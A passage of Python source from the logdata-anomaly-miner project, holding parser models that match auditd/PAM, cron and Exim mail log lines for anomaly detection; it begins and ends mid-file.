DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s3", b' msg=\'PAM: bad_ident acct=? 
: exe="'), DelimitedDataModelElement("exec", b'"'), FixedDataModelElement("s4", hostname1), DelimitedDataModelElement("clientname", b" "), FixedDataModelElement("s5", addr), DelimitedDataModelElement("clientip", b" "), FixedDataModelElement("s6", terminal), WhiteSpaceLimitedDataModelElement("terminal"), FixedDataModelElement("s7", res), pam_status_word_list, FixedDataModelElement("s8", b")'") ]), "USER_LABELED_EXPORT": AnyByteDataModelElement("user_labeled_export"), "USER_LOGIN": SequenceModelElement("userlogin", [ FixedDataModelElement("space", b" "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("s0", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s3", b" msg='acct=\""), DelimitedDataModelElement("acct", b'"'), FixedDataModelElement("s4", b'":' + exe), DelimitedDataModelElement("exec", b'"'), FixedDataModelElement("s5", hostname1), DelimitedDataModelElement("clientname", b" "), FixedDataModelElement("s6", addr), DelimitedDataModelElement("clientip", b" "), FixedDataModelElement("s7", terminal), WhiteSpaceLimitedDataModelElement("terminal"), FixedDataModelElement("s8", res), pam_status_word_list, FixedDataModelElement("s9", b")'") ]), "USER_LOGOUT": AnyByteDataModelElement("user_logout"), "USER_MAC_POLICY_LOAD": AnyByteDataModelElement("user_mac_policy_load"), "USER_MGMT": AnyByteDataModelElement("user_mgmt"), "USER_ROLE_CHANGE": SequenceModelElement("user_role_change", [ FixedDataModelElement("space", b" "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("s0", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s3", subj), DelimitedDataModelElement("subj", b" "), FixedDataModelElement("s4", b" 
msg='pam: "), DelimitedDataModelElement("msg", b" "), FixedDataModelElement("s5", b" selected-context="), DelimitedDataModelElement("selected_context", b" "), FixedDataModelElement("s6", exe), DelimitedDataModelElement("exec", b'"'), FixedDataModelElement("s7", hostname1), DelimitedDataModelElement("clientname", b" "), FixedDataModelElement("s8", addr), DelimitedDataModelElement("clientip", b" "), FixedDataModelElement("s9", terminal), WhiteSpaceLimitedDataModelElement("terminal"), FixedDataModelElement("s10", res), pam_status_word_list, FixedDataModelElement("s11", b")'") ]), "USER_SELINUX_ERR": AnyByteDataModelElement("user_selinux_err"), "USER_START": SequenceModelElement("userstart", [ FixedDataModelElement("space", b" "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("s0", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s3", b' msg=\'PAM: session open acct="'), DelimitedDataModelElement("username", b'"'), FixedDataModelElement("s4", b'" :' + exe), DelimitedDataModelElement("exec", b'"'), FixedDataModelElement("s5", hostname1), DelimitedDataModelElement("clientname", b" "), FixedDataModelElement("s6", addr), DelimitedDataModelElement("clientip", b" "), FixedDataModelElement("s7", terminal), WhiteSpaceLimitedDataModelElement("terminal"), FixedDataModelElement("s8", res), pam_status_word_list, FixedDataModelElement("s9", b")'"), ]), "USER_TTY": AnyByteDataModelElement("user_tty"), "USER_UNLABELED_EXPORT": AnyByteDataModelElement("user_unlabeled_export"), "USYS_CONFIG": AnyByteDataModelElement("usys_config"), "VIRT_CONTROL": AnyByteDataModelElement("virt_control"), "VIRT_MACHINE_ID": AnyByteDataModelElement("virt_machine_id"), "VIRT_RESOURCE": AnyByteDataModelElement("virt_resource") } type_branches["SERVICE_STOP"] = type_branches["SERVICE_START"] model = 
SequenceModelElement("audispd", [ OptionalMatchModelElement("optional", FirstMatchModelElement("type", [ FixedDataModelElement("sname", b"audispd: "), FixedDataModelElement("sname_remote", b"audisp-remote: "), ])), FirstMatchModelElement("msg", [ ElementValueBranchModelElement("record", SequenceModelElement("preamble", [ FixedDataModelElement("s0", b"type="), WhiteSpaceLimitedDataModelElement("type"), FixedDataModelElement("s1", b" msg=audit("), DecimalIntegerValueModelElement("time"), FixedDataModelElement("s0", b"."), DecimalIntegerValueModelElement("ms", value_pad_type=DecimalIntegerValueModelElement.PAD_TYPE_ZERO), FixedDataModelElement("s1", b":"), DecimalIntegerValueModelElement("seq"), FixedDataModelElement("s2", b"):") ]), "type", type_branches, default_branch=None), FixedDataModelElement("queue-full", b"queue is full - dropping event") ]) ]) return model
logdata-anomaly-miner-2.6.1/source/root/etc/aminer/conf-available/generic/CronParsingModel.py000066400000000000000000000046311437606560100322650ustar00rootroot00000000000000
"""This module defines a parser for cron."""
from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement
from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement
from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement
from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement
from aminer.parsing.FixedDataModelElement import FixedDataModelElement
from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement
from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement
from aminer.parsing.SequenceModelElement import SequenceModelElement
from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement


def get_model(user_name_model=None):
    """Return a model to parse a cron message logged via syslog after any standard logging preamble, e.g. from syslog.

    Two line shapes are covered: "CRON[<pid>]: " followed by either a "(<user>) CMD <command>" entry or a
    "pam_unix(cron:session): session opened|closed for user <user>[ by (uid=0)]" entry, and the lowercase
    "cron[<pid>]: (*system*<name>) RELOAD (<file>)" line.

    user_name_model: the element matched wherever a user name occurs. When None, a VariableByteDataModelElement
    named "user" over digits, lowercase letters, "." and "-" is used. The same instance is placed in both the
    CMD and the pam branch.
    Returns the FirstMatchModelElement "cron" forming the root of the model.
    """
    if user_name_model is None:
        user_name_model = VariableByteDataModelElement("user", b"0123456789abcdefghijklmnopqrstuvwxyz.-")

    # "(<user>) CMD <command>" - everything after "CMD " is taken as opaque bytes.
    cmd_entry = SequenceModelElement("exec", [
        FixedDataModelElement("s0", b"("),
        user_name_model,
        FixedDataModelElement("s1", b") CMD "),
        AnyByteDataModelElement("command")
    ])
    # "pam_unix(cron:session): session opened|closed for user <user>" with an optional " by (uid=0)" suffix.
    pam_entry = SequenceModelElement("pam", [
        FixedDataModelElement("s0", b"pam_unix(cron:session): session "),
        FixedWordlistDataModelElement("change", [b"opened", b"closed"]),
        FixedDataModelElement("s1", b" for user "),
        user_name_model,
        OptionalMatchModelElement("openby", FixedDataModelElement("default", b" by (uid=0)"))
    ])

    # Uppercase "CRON[<pid>]: " preamble, then one of the two entry types above.
    standard_line = SequenceModelElement("std", [
        FixedDataModelElement("sname", b"CRON["),
        DecimalIntegerValueModelElement("pid"),
        FixedDataModelElement("s0", b"]: "),
        FirstMatchModelElement("msgtype", [cmd_entry, pam_entry])
    ])
    # Lowercase "cron[<pid>]: (*system*<name>) RELOAD (<file>)" line.
    reload_line = SequenceModelElement("low", [
        FixedDataModelElement("sname", b"cron["),
        DecimalIntegerValueModelElement("pid"),
        FixedDataModelElement("s0", b"]: (*system*"),
        DelimitedDataModelElement("rname", b") RELOAD ("),
        FixedDataModelElement("s1", b") RELOAD ("),
        DelimitedDataModelElement("fname", b")"),
        FixedDataModelElement("s2", b")"),
    ])
    return FirstMatchModelElement("cron", [standard_line, reload_line])
logdata-anomaly-miner-2.6.1/source/root/etc/aminer/conf-available/generic/EximGenericParsingModel.py000066400000000000000000001140051437606560100335600ustar00rootroot00000000000000"""This module defines a generic parser model for exim.""" from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DecimalFloatValueModelElement import DecimalFloatValueModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import 
FixedDataModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement from aminer.parsing.RepeatedElementDataModelElement import RepeatedElementDataModelElement def get_model(): """Return a model to parse Exim logs from the AIT-LDS.""" alphabet = b"!'#$%&\"()*+,-./0123456789:;<>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ\\^_`abcdefghijklmnopqrstuvwxyz{|}~=[]" size_str = b" SIZE=" host_str1 = b" host " host_str = b":" + host_str1 status_code421 = b": 421" status_code450 = b": 450 " status_code451 = b": 451 " status_code452 = b": 452 <" status_code550 = b": 550" status_code553 = b": 553 " status_code554 = b": 554 " dtme = DateTimeModelElement("time", b"%Y-%m-%d %H:%M:%S") msg_id = DelimitedDataModelElement("id", b" ") ip = IpAddressDataModelElement("ip") host_ip = IpAddressDataModelElement("host_ip") host = DelimitedDataModelElement("host", b" ") size = DecimalIntegerValueModelElement("size") port = DecimalIntegerValueModelElement("port") h_str = b" H=" h_str1 = b"H=" r_str = b" R=" t_str = b" T=" f_str = b" F=<" a_str = b" A=" u_str = b" U=" p_str = b" P=" s_str = b" S=" x_str = b" X=" c_str = b" C=\"" id_str = b" id=" a = DelimitedDataModelElement("a", b" ") r = DelimitedDataModelElement("r", b" ") t = DelimitedDataModelElement("t", b" ") u = DelimitedDataModelElement("u", b" ") p = DelimitedDataModelElement("p", b" ") h = DelimitedDataModelElement("h", b" ") x = DelimitedDataModelElement("x", b" ") c = DelimitedDataModelElement("c", b'"') s = DecimalIntegerValueModelElement("s") mail_from = DelimitedDataModelElement("mail_from", b" ") smtp_error_from_remote = b"SMTP error from remote mail server after MAIL FROM:<" model = FirstMatchModelElement("model", [ SequenceModelElement("date_seq", [ dtme, 
FixedDataModelElement("sp", b" "), FirstMatchModelElement("fm", [ SequenceModelElement("start", [ FixedDataModelElement("start", b"Start queue run: pid="), DecimalIntegerValueModelElement("pid"), ]), SequenceModelElement("end", [ FixedDataModelElement("end", b"End queue run: pid="), DecimalIntegerValueModelElement("pid"), ]), SequenceModelElement("no_host_found", [ FixedDataModelElement("no_host_found_str", b"no host name found for IP address "), ip, ]), SequenceModelElement("vrfy_failed", [ FixedDataModelElement("vrfy_failed_str", b"VRFY failed for "), DelimitedDataModelElement("mail", b" "), FixedDataModelElement("h_str", h_str), h, FixedDataModelElement("sp1", b" ["), ip, FixedDataModelElement("sp2", b"]") ]), SequenceModelElement("deferred", [ msg_id, FixedDataModelElement("smtp_error", b" SMTP error from remote mail server after MAIL FROM:<"), DelimitedDataModelElement("from_mail", b">"), FixedDataModelElement("s0", b">" + size_str), size, FixedDataModelElement("s1", host_str), host, FixedDataModelElement("s2", b" ["), host_ip, FixedDataModelElement("status_code", b"]" + status_code421 + b" "), # status code has always to be 421 in this error. DelimitedDataModelElement("version", b" "), FixedDataModelElement("s3", b" ["), DelimitedDataModelElement("domain", b"]"), FirstMatchModelElement("status", [ SequenceModelElement("temporary", [ FixedDataModelElement("s4", b"] Message from ("), IpAddressDataModelElement("from_ip"), FixedDataModelElement("s5", b") temporarily deferred - "), DelimitedDataModelElement("reason_code", b" "), FixedDataModelElement("s6", b" Please refer to "), VariableByteDataModelElement("refer_addr", alphabet) ]), SequenceModelElement("permanent", [ FixedDataModelElement("s4", b"] All messages from "), IpAddressDataModelElement("from_ip"), FixedDataModelElement("s5", b" will be permanently deferred; Retrying will NOT succeed. 
See "), VariableByteDataModelElement("refer_addr", alphabet) ]) ]), ]), SequenceModelElement("temporary_deferred_new", [ msg_id, FixedDataModelElement("s0", h_str), host, FixedDataModelElement("s1", b" ["), host_ip, FixedDataModelElement("s2", b"]:"), FixedDataModelElement("smtp_error", b" SMTP error from remote mail server after pipelined MAIL FROM:<"), DelimitedDataModelElement("from_mail", b">"), FixedDataModelElement("s3", b">" + size_str), size, FixedDataModelElement("status_code", status_code421 + b" "), # status code has to be 421 in this error message. DelimitedDataModelElement("version", b" "), FixedDataModelElement("s4", b" ["), DelimitedDataModelElement("domain", b"]"), FixedDataModelElement("s5", b"] Messages from "), IpAddressDataModelElement("from_ip"), FixedDataModelElement("s6", b" temporarily deferred due to unexpected volume or user complaints - "), DelimitedDataModelElement("reason_code", b" "), FixedDataModelElement("s7", b" see "), VariableByteDataModelElement("refer_addr", alphabet) ]), SequenceModelElement("rate_limited", [ msg_id, FixedDataModelElement("smtp_error", b" SMTP error from remote mail server after end of data" + host_str), host, FixedDataModelElement("s0", b" ["), host_ip, FixedDataModelElement("status_code", b"]" + status_code421 + b"-"), # status code has to be 421 in this error message. DelimitedDataModelElement("version", b" "), FixedDataModelElement("s1", b" ["), IpAddressDataModelElement("ip"), FixedDataModelElement("s2", b" "), DecimalIntegerValueModelElement("number"), FixedDataModelElement("msg", b"] Our system has detected an unusual rate of\\n421-"), DelimitedDataModelElement("version", b" "), FixedDataModelElement("msg", b" unsolicited mail originating from your IP address. 
To protect our\\n421-"), DelimitedDataModelElement("version", b" "), FixedDataModelElement("msg", b" users from spam, mail sent from your IP address has been temporarily\\n421-"), DelimitedDataModelElement("version", b" "), FixedDataModelElement("msg", b" rate limited. Please visit\\n421-"), DelimitedDataModelElement("version", b" ", consume_delimiter=True), DelimitedDataModelElement("website", b" "), FixedDataModelElement("msg", b" to review our Bulk\\n421 "), DelimitedDataModelElement("version", b" "), FixedDataModelElement("msg", b" Email Senders Guidelines. "), msg_id, FixedDataModelElement("gsmtp", b" - gsmtp") ]), SequenceModelElement("service_unavailable", [ msg_id, FixedDataModelElement("msg", b" SMTP error from remote mail server after RCPT TO:<"), DelimitedDataModelElement("mail_to", b">"), FixedDataModelElement("s0", b">" + host_str), host, FixedDataModelElement("s1", b" ["), host_ip, FixedDataModelElement("status_code", b"]" + status_code450), DelimitedDataModelElement("version", b" "), FixedDataModelElement("msg", b" Service unavailable") ]), SequenceModelElement("host_unable_to_send", [ msg_id, FixedDataModelElement("s0", b" == "), DelimitedDataModelElement("from_mail", b" "), FixedDataModelElement("s1", r_str), r, FixedDataModelElement("s2", t_str), t, FixedDataModelElement("msg", b" defer (-44): SMTP error from remote mail server after RCPT TO:<"), DelimitedDataModelElement("to_mail", b">"), FixedDataModelElement("s3", b">" + host_str), host, FixedDataModelElement("s4", b" ["), host_ip, FixedDataModelElement("status_code", b"]" + status_code451), FixedDataModelElement("msg", b"Temporary local problem - please try later") ]), SequenceModelElement("uncomplete_sender_verify", [ FixedDataModelElement("s0", h_str1), h, FixedDataModelElement("s1", b" ("), DelimitedDataModelElement("domain", b")"), FixedDataModelElement("s2", b") ["), IpAddressDataModelElement("ipv6", ipv6=True), FixedDataModelElement("s3", b"]:"), port, FirstMatchModelElement("reason", [ 
SequenceModelElement("permission_denied", [ FixedDataModelElement("msg", b" sender verify defer for <"), DelimitedDataModelElement("from_mail", b">"), FixedDataModelElement("msg", b">: require_files: error for "), DelimitedDataModelElement("required_file", b":"), FixedDataModelElement("msg", b": Permission denied") ]), SequenceModelElement("rejected_rcpt", [ FixedDataModelElement("s0", f_str), DelimitedDataModelElement("from", b">"), FixedDataModelElement("s1", b">" + a_str), DelimitedDataModelElement("a", b" "), FixedDataModelElement("msg", b" temporarily rejected RCPT <"), DelimitedDataModelElement("rcpt", b">"), FixedDataModelElement("msg", b">: Could not complete sender verify") ]) ]) ]), SequenceModelElement("domain_size_limit_exceeded", [ msg_id, FixedDataModelElement("s0", b" =="), DelimitedDataModelElement("mail_to", b" "), FixedDataModelElement("s1", r_str), r, FixedDataModelElement("s2", t_str), t, FixedDataModelElement("msg", b" defer (-44): SMTP error from remote mail server after RCPT TO:<"), DelimitedDataModelElement("mail_to", b">"), FixedDataModelElement("s3", b">" + host_str), host, FixedDataModelElement("s4", b" ["), host_ip, FixedDataModelElement("status_code", b"]" + status_code452), DelimitedDataModelElement("mail_to", b">"), FixedDataModelElement("msg", b"> Domain size limit exceeded") ]), SequenceModelElement("verification_error", [ msg_id, FixedDataModelElement("s0", b" ** "), DelimitedDataModelElement("mail_to", b" "), FixedDataModelElement("s1", r_str), r, FixedDataModelElement("s2", t_str), DelimitedDataModelElement("t", b":"), FirstMatchModelElement("fm", [ SequenceModelElement("verification_failed", [ FixedDataModelElement("msg", b": SMTP error from remote mail server after RCPT TO:<"), DelimitedDataModelElement("mail_to", b">"), FixedDataModelElement("s3", b">" + host_str), host, FixedDataModelElement("s4", b" ["), host_ip, FixedDataModelElement("status_code", b"]" + status_code550), FixedDataModelElement("msg", b"-Verification for 
<"), DelimitedDataModelElement("mail_from", b">"), FixedDataModelElement("msg", b">\\n550-The mail server could not deliver mail to "), DelimitedDataModelElement("mail_to", b" "), FixedDataModelElement("msg", b" The account or domain may not exist, they may be blacklisted, or missing the" b" proper dns entries.\\n550 Sender verify failed") ]), SequenceModelElement("unable_to_verify", [ FixedDataModelElement("msg", b": SMTP error from remote mail server after MAIL FROM:<"), DelimitedDataModelElement("mail_from", b">"), FixedDataModelElement("s3", b">" + size_str), size, FixedDataModelElement("s4", host_str), host, FixedDataModelElement("s5", b" ["), host_ip, FixedDataModelElement("status_code", b"]" + status_code553 + b"<"), DelimitedDataModelElement("mail_to", b">"), FixedDataModelElement("msg", b"> unable to verify address\\nVerify that SMPT authentication has been enabled.") ]) ]) ]), SequenceModelElement("mail_delivery_failure", [ msg_id, FixedDataModelElement("s0", b" <= <>" + r_str), r, FixedDataModelElement("s1", u_str), u, FixedDataModelElement("s2", p_str), p, FixedDataModelElement("s3", s_str), s, FixedDataModelElement("s4", t_str), FixedDataModelElement("t", b"\"Mail delivery failed: returning message to sender\""), FixedDataModelElement("s5", b" for "), VariableByteDataModelElement("mail_from", alphabet) ]), SequenceModelElement("mail_flagged_as_spam1", [ msg_id, FixedDataModelElement("s0", h_str), h, FixedDataModelElement("s1", b" ["), host_ip, FixedDataModelElement("s2", b"]:"), port, FixedDataModelElement("msg", b" Warning: \"SpamAssassin as marka22 detected message as spam ("), DelimitedDataModelElement("version", b")"), FixedDataModelElement("s3", b")\"") ]), SequenceModelElement("mail_flagged_as_spam2", [ msg_id, FixedDataModelElement("s0", b" <="), host_ip, FixedDataModelElement("s1", h_str), DelimitedDataModelElement("h", b"["), FixedDataModelElement("s2", b"["), host_ip, FixedDataModelElement("s3", b"]:"), port, FixedDataModelElement("s4", 
p_str), p, FixedDataModelElement("s5", s_str), s, FixedDataModelElement("s6", id_str), msg_id, FixedDataModelElement("s7", t_str), AnyByteDataModelElement("msg") ]), SequenceModelElement("mail_flagged_as_spam3", [ msg_id, FixedDataModelElement("s0", b" => "), DelimitedDataModelElement("user", b" "), DelimitedDataModelElement("s1", b"<", consume_delimiter=True), mail_from, FixedDataModelElement("s2", b" [>" + r_str), r, FixedDataModelElement("s3", t_str), AnyByteDataModelElement("t") ]), SequenceModelElement("mail_flagged_as_spam4", [ msg_id, FixedDataModelElement("msg", b" Completed"), OptionalMatchModelElement("opt", SequenceModelElement("seq", [ FixedDataModelElement("s0", b" "), dtme, FixedDataModelElement("s1", b" "), msg_id, FixedDataModelElement("s2", h_str), h, FixedDataModelElement("s3", b" ["), host_ip, FixedDataModelElement("s4", b"]:"), port, FixedDataModelElement("msg", b" Warning: \"SpamAssassin as marka22 detected message as spam ("), DelimitedDataModelElement("version", b")"), FixedDataModelElement("s5", b")\"") ])) ]), SequenceModelElement("mail_flagged_as_spam5", [ msg_id, FixedDataModelElement("s0", b" <= "), mail_from, FixedDataModelElement("s1", h_str), h, FixedDataModelElement("s2", b" ["), host_ip, FixedDataModelElement("s3", b"]:"), port, FixedDataModelElement("s4", p_str), p, FixedDataModelElement("s5", s_str), s, FixedDataModelElement("s6", id_str), msg_id, FixedDataModelElement("s7", t_str + b'"'), DelimitedDataModelElement("t", b"\""), FixedDataModelElement("s8", b'" for '), mail_from, FixedDataModelElement("s9", b" "), dtme, FixedDataModelElement("s10", b" "), msg_id, FixedDataModelElement("s11", b" => "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("s12", b" <"), mail_from, FixedDataModelElement("s13", b" [>" + r_str), r, FixedDataModelElement("s14", t_str), AnyByteDataModelElement("t") ]), SequenceModelElement("mail_spam_allowed1", [ msg_id, FixedDataModelElement("s0", h_str), DelimitedDataModelElement("h", b"["), 
FixedDataModelElement("s1", b"["), host_ip, FixedDataModelElement("s2", b"]:"), port, FirstMatchModelElement("fm", [ FixedDataModelElement("msg", b" Warning: Message has been scanned: no virus or other harmful content was found"), SequenceModelElement("seq", [ FixedDataModelElement( "msg", b" Warning: \"SpamAssassin as cpaneleximscanner detected OUTGOING smtp message as NOT spam ("), DecimalFloatValueModelElement("spam_value", value_sign_type=DecimalFloatValueModelElement.SIGN_TYPE_OPTIONAL), FixedDataModelElement("s3", b")\"") ]) ]) ]), SequenceModelElement("mail_spam_allowed2", [ msg_id, FixedDataModelElement("s0", b" <= "), mail_from, FixedDataModelElement("s1", h_str), h, FixedDataModelElement("s2", b" ["), host_ip, FixedDataModelElement("s3", b"]:"), port, FixedDataModelElement("s4", p_str), p, FixedDataModelElement("s5", x_str), x, FixedDataModelElement("s6", a_str), a, FixedDataModelElement("s7", s_str), s, FixedDataModelElement("s8", t_str), t, FixedDataModelElement("msg", b" plates\" for "), AnyByteDataModelElement("mail_to") ]), SequenceModelElement("mail_spam_allowed3", [ msg_id, FixedDataModelElement("msg", b" SMTP connection outbound "), DecimalIntegerValueModelElement("timestamp"), FixedDataModelElement("s0", b" "), msg_id, FixedDataModelElement("s1", b" "), DelimitedDataModelElement("domain", b" "), FixedDataModelElement("s2", b" "), AnyByteDataModelElement("mail_to") ]), SequenceModelElement("mail_spam_allowed4", [ msg_id, FixedDataModelElement("s0", b" => "), mail_from, FixedDataModelElement("s1", r_str), r, FixedDataModelElement("s2", t_str), t, FixedDataModelElement("s3", h_str), h, FixedDataModelElement("s4", b" ["), host_ip, FixedDataModelElement("s5", b"]" + x_str), x, FixedDataModelElement("s6", c_str), c, FixedDataModelElement("s7", b"\" "), dtme, FixedDataModelElement("s8", b" "), msg_id, FixedDataModelElement("s9", b" Completed"), ]), SequenceModelElement("mail_flagged_as_spam1", [ msg_id, FixedDataModelElement("s0", h_str), h, 
FixedDataModelElement("s1", b" ["), host_ip, FixedDataModelElement("s2", b"]:"), port, FixedDataModelElement("msg", b" Warning: \"SpamAssassin as sfgthib detected message as spam ("), DelimitedDataModelElement("version", b")"), FixedDataModelElement("s3", b")\" "), dtme, FixedDataModelElement("s4", b" "), msg_id, FixedDataModelElement("s5", h_str), h, FixedDataModelElement("s6", b" ["), host_ip, FixedDataModelElement("s7", b"]:"), port, FixedDataModelElement("msg", b" Warning: Message has been scanned: no virus or other harmful content was found") ]), SequenceModelElement("mail_flagged_as_spam2", [ msg_id, FixedDataModelElement("s0", b" <= "), mail_from, FixedDataModelElement("s1", h_str), h, FixedDataModelElement("s2", b" ["), host_ip, FixedDataModelElement("s3", b"]:"), port, FixedDataModelElement("s4", p_str), p, FixedDataModelElement("s5", x_str), x, FixedDataModelElement("s6", s_str), s, FixedDataModelElement("s7", id_str), msg_id, FixedDataModelElement("s8", t_str), t, FixedDataModelElement("s9", b" for "), AnyByteDataModelElement("mail_to") ]), SequenceModelElement("mail", [ msg_id, FirstMatchModelElement("dir", [ SequenceModelElement("dir_in", [ FixedDataModelElement("in", b" <= "), FirstMatchModelElement("fm", [ SequenceModelElement("seq1", [ FixedDataModelElement("brack", b"<>"), FirstMatchModelElement("fm", [ SequenceModelElement("r", [ FixedDataModelElement("r_str", r_str), r, FixedDataModelElement("u_str", u_str), u, ]), SequenceModelElement("h", [ FixedDataModelElement("h_str", h_str), h, FixedDataModelElement("sp1", b" ["), ip, FixedDataModelElement("sp1", b"]"), ]) ]), FixedDataModelElement("sp2", p_str), p, FixedDataModelElement("sp2", p_str), s, ]), SequenceModelElement("seq2", [ DelimitedDataModelElement("mail", b" "), FixedDataModelElement("user_str", u_str), DelimitedDataModelElement("user", b" "), FixedDataModelElement("p_str", p_str), p, FixedDataModelElement("s_str", s_str), s, OptionalMatchModelElement( "id", SequenceModelElement("id", [ 
FixedDataModelElement("id_str", id_str), AnyByteDataModelElement("id") ]) ) ]) ]) ]), SequenceModelElement("dir_out", [ FixedDataModelElement("in", b" => "), DelimitedDataModelElement("name", b" "), FixedDataModelElement("sp1", b" "), OptionalMatchModelElement( "mail_opt", SequenceModelElement("mail", [ FixedDataModelElement("brack1", b"("), DelimitedDataModelElement("brack_mail", b")"), FixedDataModelElement("brack2", b") "), ])), FixedDataModelElement("sp2", b"<"), DelimitedDataModelElement("mail", b">"), FixedDataModelElement("r_str", b">" + r_str), r, FixedDataModelElement("t_str", t_str), VariableByteDataModelElement("t", alphabet), ]), SequenceModelElement("aster", [ FixedDataModelElement("aster", b" ** "), DelimitedDataModelElement("command", b" "), FixedDataModelElement("headers_str", b' Too many "Received" headers - suspected mail loop')]), FixedDataModelElement("completed", b" Completed"), FixedDataModelElement("frozen", b" Message is frozen"), FixedDataModelElement("frozen", b" Frozen (delivery error message)") ]) ]), ]) ]), SequenceModelElement("no_date_seq", [ FixedDataModelElement("s0", b"TO:<"), DelimitedDataModelElement("to_mail", b">"), FixedDataModelElement("s1", b">" + host_str), host, FixedDataModelElement("s2", b" ["), host_ip, FixedDataModelElement("status_code", b"]" + status_code450), # status code has to be 450 in this error message. 
DelimitedDataModelElement("version", b" "), FixedDataModelElement("msg", b" Client host rejected: cannot find your hostname, ["), host_ip, FixedDataModelElement("s3", b"] "), dtme, FixedDataModelElement("s4", b" "), msg_id, FixedDataModelElement("s5", b" ** "), DelimitedDataModelElement("to_mail", b">"), FixedDataModelElement("msg", b">: retry timeout exceeded") ]), SequenceModelElement("invalid_dns_record", [ FixedDataModelElement("msg", b"SMTP error from remote mail server after RCPT TO:" + host_str), DelimitedDataModelElement("host", b"["), FixedDataModelElement("s0", b"["), host_ip, FixedDataModelElement("status_code", b"]" + status_code550), FixedDataModelElement("msg", b"-Sender has no A, AAAA, or MX DNS records. "), DelimitedDataModelElement("host", b"\\"), FixedDataModelElement("s1", b"\\n550 l "), DelimitedDataModelElement("host", b"\\"), FixedDataModelElement("msg", b"\\nVerify the zone file in "), DelimitedDataModelElement("file", b" "), FixedDataModelElement("msg", b" for the correct information. 
If it appear correct, you can run named-checkzone " b"domain.com domain.com.db to verify if named is able to load the zone.") ]), SequenceModelElement("mail_rejected", [ FixedDataModelElement("msg", b"Diagnostic-Code: X-Postfix;" + host_str1), host, FixedDataModelElement("s0", b" ["), host_ip, FixedDataModelElement("status_code", b"] said" + status_code550 + b" "), DelimitedDataModelElement("version", b" "), FixedDataModelElement("msg", b" Message rejected due to content restrictions (in reply to end of DATA command)\\nWhen you see " b"an error such as 550 "), VariableByteDataModelElement("version", alphabet) ]), SequenceModelElement("mail_authentication_error", [ FixedDataModelElement("msg", b"Final-Recipient: rfc822;"), DelimitedDataModelElement("mail_from", b"\\"), FixedDataModelElement("msg", b"\\nAction: failed\\nStatus: "), DelimitedDataModelElement("status", b"\\"), FixedDataModelElement("msg", b"\\nDiagnostic-Code: smtp;550-Please turn on SMTP Authentication in your mail client.\\n550-"), host, FixedDataModelElement("s0", b" ["), host_ip, FixedDataModelElement("s1", b"]:"), port, FixedDataModelElement("msg", b" is not permitted to relay 550 through this server without authentication.") ]), SequenceModelElement("bad_helo_record", [ DelimitedDataModelElement("cipher_suite", b" "), FixedDataModelElement("msg", b" " + smtp_error_from_remote), DelimitedDataModelElement("mail_from", b">"), FixedDataModelElement("s0", b">" + size_str), size, FixedDataModelElement("s1", host_str), host, FixedDataModelElement("s2", b" ["), host_ip, OptionalMatchModelElement("optional", SequenceModelElement("seq", [ FixedDataModelElement("to", b".."), DecimalIntegerValueModelElement("upper_ip") ])), FixedDataModelElement("status_code", b"]" + status_code550), FixedDataModelElement("msg", b" \"REJECTED - Bad HELO - Host impersonating ["), DelimitedDataModelElement("original_host", b"]"), FixedDataModelElement("s3", b"]\"") ]), SequenceModelElement("domain_not_exists", [ 
FixedDataModelElement("msg", smtp_error_from_remote), DelimitedDataModelElement("mail_from", b">"), FixedDataModelElement("s0", b">" + host_str), host, FixedDataModelElement("s1", b" ["), host_ip, FixedDataModelElement("status_code", b"]" + status_code553), FixedDataModelElement("msg", b"sorry, your domain does not exists.") ]), SequenceModelElement("rejected_due_to_spam_content", [ DateTimeModelElement("time", b"[%H:%M:%S"), FixedDataModelElement("hosts", b" hosts"), DecimalIntegerValueModelElement("hosts_number"), FixedDataModelElement("s0", b" "), RepeatedElementDataModelElement("rep", FirstMatchModelElement("fm", [ SequenceModelElement("seq", [ dtme, FixedDataModelElement("s1", b" "), msg_id, FixedDataModelElement("s2", b" <= <>" + r_str), r, FixedDataModelElement("s3", u_str), u, FixedDataModelElement("s4", p_str), p, FixedDataModelElement("s5", s_str), s, FixedDataModelElement("s6", t_str + b'"'), DelimitedDataModelElement("t", b'"'), FixedDataModelElement("s7", b'" for '), mail_from, FixedDataModelElement("s8", b" "), dtme, FixedDataModelElement("s9", b" cwd="), DelimitedDataModelElement("cwd", b" "), FixedDataModelElement("s10", b" "), DecimalIntegerValueModelElement("args_num"), FixedDataModelElement("s11", b" args: "), RepeatedElementDataModelElement("rep", FirstMatchModelElement("fm", [ SequenceModelElement("seq", [ dtme, FixedDataModelElement("s12", b" "), msg_id, FixedDataModelElement("s13", b" ** "), mail_from, FixedDataModelElement("s14", r_str), r, FixedDataModelElement("s15", t_str), DelimitedDataModelElement("t", b":"), 